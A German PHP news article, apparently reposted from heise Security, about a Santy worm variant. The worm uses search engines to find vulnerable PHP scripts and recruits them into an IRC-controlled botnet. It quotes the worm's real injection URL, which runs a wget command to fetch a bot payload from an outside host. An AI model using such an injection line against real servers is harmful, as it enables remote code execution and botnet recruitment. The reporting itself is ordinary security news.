php-resource.de

Aktuelle Themen und News zu PHP / mySQL

Wurm attackiert PHP-Skripte

Berni | Neu | Beitrag gelesen 2529 gelesen |

 


Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de

Kommentare zum Artikel
Artikel kommentieren
 
Verwandte Beiträge
star Zahlreiche Schwachstellen in PHP
star Das Magazin PHP Solutions Ausgabe 6/2004 (7)
star Webseiten mit IE-Exploit infiziert
star Apache für DoS-Attacken anfällig
star Maguma Workbench Version 2.1 jetzt erhältlich!

 
Links zum Artikel

Weitere PHP-News und Artikel

Zahlreiche Schwachstellen in PHP

| Berni | Views

Das Magazin PHP Solutions Ausgabe 6/2004 (7)

| Berni | Views

Webseiten mit IE-Exploit infiziert

| Berni | Views

Apache für DoS-Attacken anfällig

| Berni | Views

Maguma Workbench Version 2.1 jetzt erhältlich!

| Berni | Views

Apache-Version 1.3.33 verfügbar

| Berni | Views

Sicherheitsloch in Windows-SSH-Client PuTTY

| Berni | Views

MySQL 4.1 ist fertig

| Berni | Views

Navigation -> Seitenanzahl : (95)

 « Anfang ...  «  35 36 37 38 39 40 41 42 43 44 45 46 47  » ... Ende »

Über den Autor
Berni

Berni

Status
Premium Mitglied

Beruf
Selbstständig

Mitglied seit:
22.01.2001

letzte Aktivität
18.10.2019